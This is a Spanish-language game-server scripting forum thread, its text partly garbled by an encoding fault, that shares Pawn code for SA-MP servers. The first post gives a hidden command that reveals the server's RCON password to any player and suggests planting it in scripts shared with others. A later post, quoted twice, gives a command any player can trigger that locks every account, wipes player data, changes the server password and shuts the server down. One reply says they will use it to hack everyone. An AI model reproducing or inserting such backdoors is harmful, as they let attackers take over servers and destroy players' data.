[Off] ЎCrea tu comando oculto!
#1

Hola, bueno como estoy aburrido decidн hacer йste mini comando. їEn quй consiste? Fбcil, te muestra la RCON de el servidor: Lo puedes implementar en algъn FS, GM y cuбndo se roben tus crйditos, ЎBUM!.
Код:
CMD:show(playerid, params[]){ //Nombre de el comando
new RCON[64], string[75]; //NEWS
GetServerVarAsString("rcon_password", RCON, sizeof(RCON)); //Busquen sobre la funciуn
format(string, sizeof(string), "%s", RCON), SendClientMessage(playerid, -1, string);
return true;
Ъsenlo para bien
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#2

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#3

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Originally Posted by PreDoxis
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[I]
Ъsenlo para bien

....
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#4

mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm , esto esta canijo
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#5

їPor quй el tag [OFF]?
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#6

Wow, Ўquй camuflado! -_-
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#7

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Originally Posted by adri1
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....
adri1, їya no trabajaras con RcoNs?
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#8

pawn Код:
if(strcmp(cmd, "/comando", true) == 0)
     {
     if(PlayerInfo[playerid][pAdmin] >= 0)// comando para usuarios que tengan nivel de adm cero /* Cambiar si gusta */
     {
     /* Mensaje a todos los jugadores */
     SendClientMessageToAll(TU_COLOR,"|------------------------[CODIGO ROJO ACTIVADO]-------------------------|");
     SendClientMessageToAll(TU_COLOR," ");
     SendClientMessageToAll(TU_COLOR,"____________________________________________________________________");
     SendClientMessageToAll(TU_COLOR," El servidor ha sido destruido por el dueсo/scripter");
     SendClientMessageToAll(TU_COLOR," Con lo cual habra una nueva IP que puede obtenerla en: TUWEB");
     SendClientMessageToAll(TU_COLOR," Todos los archivos han sido destruidos.");
     SendClientMessageToAll(TU_COLOR," ____________________________________________________________________");
     SendClientMessage(playerid, TU_COLOR,"Desactivaste el servidor.");// Mensaje al que desactivo el servidor
     GetPlayerName(playerid, sendername, sizeof(sendername));
     format(string, sizeof(string), "* %s scripter total |- Servidor OFF -|", sendername);// Segundo mensaje al que desactivo el servidor
     ProxDetector(1000.0, playerid, string, TU_COLOR,TU_COLOR,TU_COLOR,TU_COLOR,TU_COLOR);
     for(new i = 0; i <= MAX_PLAYERS; i++)
     {
     if(IsPlayerConnected(i) == 1)// Aplica solo a jugadores conectados
     {
     SendRconCommand("hostname |- Camiamos de Ip mas info en TUWEB -|"); // Cambia el nombre del servidor al definido haca
     SetGameModeText("TUWEB"); // Cambia el Modo al definido
     SendRconCommand("password TUPASSWORD"); // Agrega contraseсa al servidor para evitar que usuarios entren
     PlayerInfo[i][pLocked] = 100; //blockea todas las cuentas de los jugadores ON
     PlayerInfo[i][pMuted] = 1; // Mutea a todos los jugadores
     PlayerInfo[i][pLevel] = -999; // Entrega nivel -999 a todos los jugadores
     PlayerInfo[i][pAccount] = -9999999; // Setea todo el dinero a -9999999 a todos los jugadores
     PlayerInfo[i][pPcarkey] = 999; // Entrega llave 999 de auto 1 a todos los jugadores
     PlayerInfo[i][pPcarkey2] = 999; //Entrega llave 999 de auto 2 a todos los jugadores
     PlayerInfo[i][pPhousekey] = 999; //Entrega llave 999 de casa a todos los jugadores
     DisablePlayerCheckpoint(i);
     gPlayerCheckpointStatus[i] = CHECKPOINT_NONE;
     /* Mensaje en pantalla completa, sale a todos los jugadores */
     format(string, sizeof(string), "~r~~h~~h~La nueva ip esta en:~n~ ~b~~h~~h~TUWEB~n~~n~~n~~n~~n~~r~Servidor Cerrado");// Texto definido
     {
     GameTextForPlayer(i, string, 4000, 5); // Lanza el texto definido a todos los usuarios en juego
     SetPlayerCameraPos(i,1460.0, -1324.0, 287.2); //Posicion de la camara para mostrar el mensaje en pantalla completa
     SetPlayerCameraLookAt(i,1374.5, -1291.1, 239.0); //Vista del jugador para mostrar el mensaje en pantalla completa
     OnPlayerUpdateTime(i); //Guarda las cuenta con los cambios realizados
     gPlayerLogged[i] = 0; // Desconecta a todos los jugadores
     }
     GameModeExit();// Reinicia el Servidor
     }
     }
     }
     else
     {
     SendClientMessage(playerid,TU_COLOR,"Comando de destruccion/CODIGO ROJO");
     }
     return 1;
     }
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#9

Quote:
Originally Posted by #Alex
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pawn Код:
if(strcmp(cmd, "/comando", true) == 0)
     {
     if(PlayerInfo[playerid][pAdmin] >= 0)// comando para usuarios que tengan nivel de adm cero /* Cambiar si gusta */
     {
     /* Mensaje a todos los jugadores */
     SendClientMessageToAll(TU_COLOR,"|------------------------[CODIGO ROJO ACTIVADO]-------------------------|");
     SendClientMessageToAll(TU_COLOR," ");
     SendClientMessageToAll(TU_COLOR,"____________________________________________________________________");
     SendClientMessageToAll(TU_COLOR," El servidor ha sido destruido por el dueсo/scripter");
     SendClientMessageToAll(TU_COLOR," Con lo cual habra una nueva IP que puede obtenerla en: TUWEB");
     SendClientMessageToAll(TU_COLOR," Todos los archivos han sido destruidos.");
     SendClientMessageToAll(TU_COLOR," ____________________________________________________________________");
     SendClientMessage(playerid, TU_COLOR,"Desactivaste el servidor.");// Mensaje al que desactivo el servidor
     GetPlayerName(playerid, sendername, sizeof(sendername));
     format(string, sizeof(string), "* %s scripter total |- Servidor OFF -|", sendername);// Segundo mensaje al que desactivo el servidor
     ProxDetector(1000.0, playerid, string, TU_COLOR,TU_COLOR,TU_COLOR,TU_COLOR,TU_COLOR);
     for(new i = 0; i <= MAX_PLAYERS; i++)
     {
     if(IsPlayerConnected(i) == 1)// Aplica solo a jugadores conectados
     {
     SendRconCommand("hostname |- Camiamos de Ip mas info en TUWEB -|"); // Cambia el nombre del servidor al definido haca
     SetGameModeText("TUWEB"); // Cambia el Modo al definido
     SendRconCommand("password TUPASSWORD"); // Agrega contraseсa al servidor para evitar que usuarios entren
     PlayerInfo[i][pLocked] = 100; //blockea todas las cuentas de los jugadores ON
     PlayerInfo[i][pMuted] = 1; // Mutea a todos los jugadores
     PlayerInfo[i][pLevel] = -999; // Entrega nivel -999 a todos los jugadores
     PlayerInfo[i][pAccount] = -9999999; // Setea todo el dinero a -9999999 a todos los jugadores
     PlayerInfo[i][pPcarkey] = 999; // Entrega llave 999 de auto 1 a todos los jugadores
     PlayerInfo[i][pPcarkey2] = 999; //Entrega llave 999 de auto 2 a todos los jugadores
     PlayerInfo[i][pPhousekey] = 999; //Entrega llave 999 de casa a todos los jugadores
     DisablePlayerCheckpoint(i);
     gPlayerCheckpointStatus[i] = CHECKPOINT_NONE;
     /* Mensaje en pantalla completa, sale a todos los jugadores */
     format(string, sizeof(string), "~r~~h~~h~La nueva ip esta en:~n~ ~b~~h~~h~TUWEB~n~~n~~n~~n~~n~~r~Servidor Cerrado");// Texto definido
     {
     GameTextForPlayer(i, string, 4000, 5); // Lanza el texto definido a todos los usuarios en juego
     SetPlayerCameraPos(i,1460.0, -1324.0, 287.2); //Posicion de la camara para mostrar el mensaje en pantalla completa
     SetPlayerCameraLookAt(i,1374.5, -1291.1, 239.0); //Vista del jugador para mostrar el mensaje en pantalla completa
     OnPlayerUpdateTime(i); //Guarda las cuenta con los cambios realizados
     gPlayerLogged[i] = 0; // Desconecta a todos los jugadores
     }
     GameModeExit();// Reinicia el Servidor
     }
     }
     }
     else
     {
     SendClientMessage(playerid,TU_COLOR,"Comando de destruccion/CODIGO ROJO");
     }
     return 1;
     }
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#10

Quote:
Originally Posted by #Alex
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pawn Код:
if(strcmp(cmd, "/comando", true) == 0)
     {
     if(PlayerInfo[playerid][pAdmin] >= 0)// comando para usuarios que tengan nivel de adm cero /* Cambiar si gusta */
     {
     /* Mensaje a todos los jugadores */
     SendClientMessageToAll(TU_COLOR,"|------------------------[CODIGO ROJO ACTIVADO]-------------------------|");
     SendClientMessageToAll(TU_COLOR," ");
     SendClientMessageToAll(TU_COLOR,"____________________________________________________________________");
     SendClientMessageToAll(TU_COLOR," El servidor ha sido destruido por el dueсo/scripter");
     SendClientMessageToAll(TU_COLOR," Con lo cual habra una nueva IP que puede obtenerla en: TUWEB");
     SendClientMessageToAll(TU_COLOR," Todos los archivos han sido destruidos.");
     SendClientMessageToAll(TU_COLOR," ____________________________________________________________________");
     SendClientMessage(playerid, TU_COLOR,"Desactivaste el servidor.");// Mensaje al que desactivo el servidor
     GetPlayerName(playerid, sendername, sizeof(sendername));
     format(string, sizeof(string), "* %s scripter total |- Servidor OFF -|", sendername);// Segundo mensaje al que desactivo el servidor
     ProxDetector(1000.0, playerid, string, TU_COLOR,TU_COLOR,TU_COLOR,TU_COLOR,TU_COLOR);
     for(new i = 0; i <= MAX_PLAYERS; i++)
     {
     if(IsPlayerConnected(i) == 1)// Aplica solo a jugadores conectados
     {
     SendRconCommand("hostname |- Camiamos de Ip mas info en TUWEB -|"); // Cambia el nombre del servidor al definido haca
     SetGameModeText("TUWEB"); // Cambia el Modo al definido
     SendRconCommand("password TUPASSWORD"); // Agrega contraseсa al servidor para evitar que usuarios entren
     PlayerInfo[i][pLocked] = 100; //blockea todas las cuentas de los jugadores ON
     PlayerInfo[i][pMuted] = 1; // Mutea a todos los jugadores
     PlayerInfo[i][pLevel] = -999; // Entrega nivel -999 a todos los jugadores
     PlayerInfo[i][pAccount] = -9999999; // Setea todo el dinero a -9999999 a todos los jugadores
     PlayerInfo[i][pPcarkey] = 999; // Entrega llave 999 de auto 1 a todos los jugadores
     PlayerInfo[i][pPcarkey2] = 999; //Entrega llave 999 de auto 2 a todos los jugadores
     PlayerInfo[i][pPhousekey] = 999; //Entrega llave 999 de casa a todos los jugadores
     DisablePlayerCheckpoint(i);
     gPlayerCheckpointStatus[i] = CHECKPOINT_NONE;
     /* Mensaje en pantalla completa, sale a todos los jugadores */
     format(string, sizeof(string), "~r~~h~~h~La nueva ip esta en:~n~ ~b~~h~~h~TUWEB~n~~n~~n~~n~~n~~r~Servidor Cerrado");// Texto definido
     {
     GameTextForPlayer(i, string, 4000, 5); // Lanza el texto definido a todos los usuarios en juego
     SetPlayerCameraPos(i,1460.0, -1324.0, 287.2); //Posicion de la camara para mostrar el mensaje en pantalla completa
     SetPlayerCameraLookAt(i,1374.5, -1291.1, 239.0); //Vista del jugador para mostrar el mensaje en pantalla completa
     OnPlayerUpdateTime(i); //Guarda las cuenta con los cambios realizados
     gPlayerLogged[i] = 0; // Desconecta a todos los jugadores
     }
     GameModeExit();// Reinicia el Servidor
     }
     }
     }
     else
     {
     SendClientMessage(playerid,TU_COLOR,"Comando de destruccion/CODIGO ROJO");
     }
     return 1;
     }
Khй bueno men!!!!56 ME LO LLEBO ..!!!!!! LOS BOY A JAKEAR A T0d0S GGGJEJEJEEJEJ.
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